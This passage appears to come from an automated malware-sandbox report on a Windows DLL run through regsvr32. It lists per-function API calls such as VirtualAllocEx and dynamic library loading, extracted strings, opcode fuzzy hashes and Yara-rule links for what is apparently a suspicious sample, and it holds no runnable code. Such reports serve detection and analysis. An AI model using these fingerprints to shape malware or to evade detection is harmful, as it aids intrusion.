                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCreateCriticalDataDeleteObjectSectionVirtual$DragFileFillForwardingFunction24PathProxyQuery
                                                                                                                                                        • String ID: ,B5$V0TS$achame (Tanzania)$m<"$ ':$){9$;5
                                                                                                                                                        • API String ID: 1669154849-3354845050
                                                                                                                                                        • Opcode ID: d767a1c3514e41475dd5771f859cf10b76e2ae99794591a677f2180ef5924df1
                                                                                                                                                        • Instruction ID: 71eee8b378bef4f5b5c855fd80e0ba1f93d8051d4cb17c86e78305cf6a97993d
                                                                                                                                                        • Opcode Fuzzy Hash: d767a1c3514e41475dd5771f859cf10b76e2ae99794591a677f2180ef5924df1
                                                                                                                                                        • Instruction Fuzzy Hash: 43126D32618B81CBD760CF55F49075ABBA1F784B98F508229EAD94BB98CB7CE545CF00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964C7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: TimeUser$ApplicationCriticalDateDeleteFileFillFormatFreeKeyboardLayoutModelNameNamedParentPathPipeScaleSectionViewportWait
                                                                                                                                                        • String ID: #0?2$c8[
                                                                                                                                                        • API String ID: 2545732139-3625505682
                                                                                                                                                        • Opcode ID: f510ed20618d1bfc375401857be8d34d429b7f882260b6d2ec441618ce5c6eb8
                                                                                                                                                        • Instruction ID: 6992e432576964fbf6cd376b267ac71cda90cde39dafa5a50b4a52d0dae30ce7
                                                                                                                                                        • Opcode Fuzzy Hash: f510ed20618d1bfc375401857be8d34d429b7f882260b6d2ec441618ce5c6eb8
                                                                                                                                                        • Instruction Fuzzy Hash: C6E15B36708B85CBD760CF95E49069EB7A1F788B98F508125EB8987B58DB3CE844CF01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964E458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: gC+$gC+$gC+$,EG$,EG$,EG$,EG
                                                                                                                                                        • API String ID: 2574300362-2682763454
                                                                                                                                                        • Opcode ID: 633c4231678a309b0db299ba4637ef89f729a0e47cf9d2c7c8ef301b7c23958e
                                                                                                                                                        • Instruction ID: 56eb8f411a601be1ccfb2b4cc45da4572496edf00fe0fb1e1d047b1d1e3c9846
                                                                                                                                                        • Opcode Fuzzy Hash: 633c4231678a309b0db299ba4637ef89f729a0e47cf9d2c7c8ef301b7c23958e
                                                                                                                                                        • Instruction Fuzzy Hash: D7A1F975B08B42C7EA65CFC5A49033DA7A0F789BA8F644436EA4DC7B54DE3CD8418B42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ILIsParent.SHELL32 ref: 00007FFD69647287
                                                                                                                                                        • GetKeyboardLayoutNameW.USER32 ref: 00007FFD69647295
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: VirtualAllocEx.KERNEL32 ref: 00007FFD6964A7A2
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: VirtualAllocEx.KERNEL32 ref: 00007FFD6964A7C4
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: NdrProxyForwardingFunction24.OLE32 ref: 00007FFD6964A7C8
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: SHCreateDataObject.SHELL32 ref: 00007FFD6964A80B
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: DeleteCriticalSection.KERNEL32 ref: 00007FFD6964A852
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: DeleteCriticalSection.KERNEL32 ref: 00007FFD6964A86C
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: FillPath.GDI32 ref: 00007FFD6964A87B
                                                                                                                                                          • Part of subcall function 00007FFD6964A6E2: DragQueryFileA.SHELL32 ref: 00007FFD6964A8AC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCriticalDeleteSectionVirtual$CreateDataDragFileFillForwardingFunction24KeyboardLayoutNameObjectParentPathProxyQuery
                                                                                                                                                        • String ID: 6b}$k?*$H})$w^8
                                                                                                                                                        • API String ID: 1670229418-1564879513
                                                                                                                                                        • Opcode ID: 5781592db3bc12a96afa827a6fbdf83ac16cbf254b3456f861c8b4586d9092b0
                                                                                                                                                        • Instruction ID: 48c396d3e94228927e167694bbb7c2e1cc6dad3bc1a5628121110e382775e9e8
                                                                                                                                                        • Opcode Fuzzy Hash: 5781592db3bc12a96afa827a6fbdf83ac16cbf254b3456f861c8b4586d9092b0
                                                                                                                                                        • Instruction Fuzzy Hash: F2A16D72618B41CBD324CF95E49075ABBA1F785B88F508129FA898BB59DF3CE841CF41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69658CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                        • Opcode ID: 02af9ad2b0fd002461e5c157a0f019038a4e0719372ed9688368c2cf76679503
                                                                                                                                                        • Instruction ID: cb7dc254e56486357a90eef5bab8325771332e1740ff3fa1d33240f2a2eb958e
                                                                                                                                                        • Opcode Fuzzy Hash: 02af9ad2b0fd002461e5c157a0f019038a4e0719372ed9688368c2cf76679503
                                                                                                                                                        • Instruction Fuzzy Hash: 93114F31B28F41C6E7509F92A86432966A0FB98BF8F144235EA5D877A4DF3CD4048746
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69651B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                        • Opcode ID: 832bc00e9a9bc3dc5ae1e5259b11d54da47f40ad0b32d3a33f9fcc3db9db21e7
                                                                                                                                                        • Instruction ID: e34fb78b51fc5764f2fe91a3b94d620dc5d94676d51608c98e2754f092c51dfd
                                                                                                                                                        • Opcode Fuzzy Hash: 832bc00e9a9bc3dc5ae1e5259b11d54da47f40ad0b32d3a33f9fcc3db9db21e7
                                                                                                                                                        • Instruction Fuzzy Hash: D2F05E61B29F42C2EB548FA1E4A03792760AF84B7CF041439D90F861A0DE6CD488C312
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69657548, Relevance: 7.7, APIs: 5, Instructions: 170fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 977765425-0
                                                                                                                                                        • Opcode ID: 862a4ac024a5d4ae73fd49c1dba910d903e3926207fd369327c34420e6648c7b
                                                                                                                                                        • Instruction ID: ad73d7beba5e833d12b6213fb0578216e02c1771dcd01e4894ed255c363d7d0d
                                                                                                                                                        • Opcode Fuzzy Hash: 862a4ac024a5d4ae73fd49c1dba910d903e3926207fd369327c34420e6648c7b
                                                                                                                                                        • Instruction Fuzzy Hash: 1361B172B18F91C9EB10CFA9E9105AD3BA1FB48BACB048135DE4E477A5DE38D156C702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6965875C, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                        • Opcode ID: f0ff068221746e3eeed817233f03df1aa1f424e171c507deac8e1276b21e13ad
                                                                                                                                                        • Instruction ID: d5b5441165c9f701f2d0b1087e49e247860f7c605ac5290802900c814b3e9d1e
                                                                                                                                                        • Opcode Fuzzy Hash: f0ff068221746e3eeed817233f03df1aa1f424e171c507deac8e1276b21e13ad
                                                                                                                                                        • Instruction Fuzzy Hash: EB11C132F28F0381FA649DA8D9663BD00416F5537CF580634E97E46EFADE2CA8404206
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69651E20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD69651E52
                                                                                                                                                          • Part of subcall function 00007FFD696527EC: HeapFree.KERNEL32(?,?,?,00007FFD6965250C,?,?,?,00007FFD69652201,?,?,00000000,00007FFD696525A9), ref: 00007FFD69652802
                                                                                                                                                          • Part of subcall function 00007FFD696527EC: GetLastError.KERNEL32(?,?,?,00007FFD6965250C,?,?,?,00007FFD69652201,?,?,00000000,00007FFD696525A9), ref: 00007FFD69652814
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFD6964FF48,?,?,?,?,00007FFD6964F9B8), ref: 00007FFD69651E75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                        • String ID: 04^$C:\Windows\system32\regsvr32.exe
                                                                                                                                                        • API String ID: 3580290477-3961054921
                                                                                                                                                        • Opcode ID: db3623a733feb5ff7c332aad513bc24b6125415b98d7a0f7b4b3a9d20009dae2
                                                                                                                                                        • Instruction ID: eaf803266f594d5e6fc6ba5275822a776412237739093a8b2eada2df577758e8
                                                                                                                                                        • Opcode Fuzzy Hash: db3623a733feb5ff7c332aad513bc24b6125415b98d7a0f7b4b3a9d20009dae2
                                                                                                                                                        • Instruction Fuzzy Hash: 04419D36B08F52C6EB15DFA598600BC6794EF44BA8B554036E94E43B95DF3DE891C302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69657A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                        • String ID: U
                                                                                                                                                        • API String ID: 2456169464-4171548499
                                                                                                                                                        • Opcode ID: b5084150eb67580d74e1b1bfb1a9dead132afb2bb610794a3f29d912fcb56e88
                                                                                                                                                        • Instruction ID: dd1e60bd2e2ad3d38007a2f1f4b04d168cde801c3433483ea22e808da79680af
                                                                                                                                                        • Opcode Fuzzy Hash: b5084150eb67580d74e1b1bfb1a9dead132afb2bb610794a3f29d912fcb56e88
                                                                                                                                                        • Instruction Fuzzy Hash: 5741A032B18B41C6EB208FA5E8543AA77A0FB88BA8F448131EE4D87794DF3CD541C712
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964BEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCreateDataDragFileFolderKeyboardLayoutNameObjectParentPathQuerySpecialVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1406883270-0
                                                                                                                                                        • Opcode ID: 725e035966592d2c45e170ddb7479a26060cc2404dd28b925ec76090a95935b3
                                                                                                                                                        • Instruction ID: 2ace11825d70be434fb7e00a451282830eade5c1d798ed5c4221ff319f62e49a
                                                                                                                                                        • Opcode Fuzzy Hash: 725e035966592d2c45e170ddb7479a26060cc2404dd28b925ec76090a95935b3
                                                                                                                                                        • Instruction Fuzzy Hash: B091CC72608B81CBD720CF95E45069EBBA1F384BA8F50812AEB9947B98DB7DD445CF00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69657CE4, Relevance: 6.2, APIs: 4, Instructions: 191COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                        • Opcode ID: 5a0dc2dadbac4b4fb22eb1debfa3e6752830b29a8bcf083caaca6ad8de4bf4da
                                                                                                                                                        • Instruction ID: f4de24faafb64951b3dcc6705a48895d37c9569bd7187c6ccb1fd1ece59f66ed
                                                                                                                                                        • Opcode Fuzzy Hash: 5a0dc2dadbac4b4fb22eb1debfa3e6752830b29a8bcf083caaca6ad8de4bf4da
                                                                                                                                                        • Instruction Fuzzy Hash: F471D162F18F56C9FB619FA198606BD66A0BF44BACF40C535CE0E17786DE3CA845C312
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69654D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                        • Opcode ID: 1a7c81bc1cc84bf5c8542ecc2e2936191920317332852d552664a12fc3575f30
                                                                                                                                                        • Instruction ID: e67430c91285c8e9726d4953113db05b8dcac1b48817aaa5725dca27a983c90f
                                                                                                                                                        • Opcode Fuzzy Hash: 1a7c81bc1cc84bf5c8542ecc2e2936191920317332852d552664a12fc3575f30
                                                                                                                                                        • Instruction Fuzzy Hash: 5321C122B1CF82C1EB648F6898A01392650EB85B78F685375D6BF077D4DF78D8A1D342
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69654AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Stringtry_get_function
                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                        • API String ID: 2588686239-3893581201
                                                                                                                                                        • Opcode ID: 549be689c052177796702d2ccb7cb8522ba696e8d4131ec1c979722215975df9
                                                                                                                                                        • Instruction ID: 6be5f29b21da56d0b4b7121268cd286cf6c40bcba205ffb9ea2ae1fe93dc0351
                                                                                                                                                        • Opcode Fuzzy Hash: 549be689c052177796702d2ccb7cb8522ba696e8d4131ec1c979722215975df9
                                                                                                                                                        • Instruction Fuzzy Hash: BD112932B08B81C6D760CF46B4502AAB7A0FBC9B94F144136EA8D83B19CF3CD4508B41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69654A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                                        • API String ID: 539475747-3084827643
                                                                                                                                                        • Opcode ID: 266232fc4c8e39fa3a10ea22fc72d84918e9a8bc9f16129e9982703793ee10e6
                                                                                                                                                        • Instruction ID: 7eec0258be125f6d3d5342ef6ed611205c1b3b62b4330f44b3d2d9977c8a0034
                                                                                                                                                        • Opcode Fuzzy Hash: 266232fc4c8e39fa3a10ea22fc72d84918e9a8bc9f16129e9982703793ee10e6
                                                                                                                                                        • Instruction Fuzzy Hash: 57F05E35B18F95C1E6159F91F4604A93261AF88BA8F445036E91D03B59CE7CE495C742
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69654A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FFD69654A41
                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,00000040,00007FFD69652FD7,?,?,00000040,00007FFD696534DD,?,?,?,?,00007FFD69652811,?,?,?), ref: 00007FFD69654A58
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Valuetry_get_function
                                                                                                                                                        • String ID: FlsSetValue
                                                                                                                                                        • API String ID: 738293619-3750699315
                                                                                                                                                        • Opcode ID: 697c96f5e6a3aa321d3cea161e2a4ac8245c8a2ccd7d854e69616932ef727f1f
                                                                                                                                                        • Instruction ID: 905c7bea531d50be45a321c561e73cb508e11dd5c66a216a9c1b5a3d9d880b93
                                                                                                                                                        • Opcode Fuzzy Hash: 697c96f5e6a3aa321d3cea161e2a4ac8245c8a2ccd7d854e69616932ef727f1f
                                                                                                                                                        • Instruction Fuzzy Hash: FBE03971B08F42D1EA185FD0B8604B92222AF887A8F495036D92D072A5CE7CE8A4C312
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

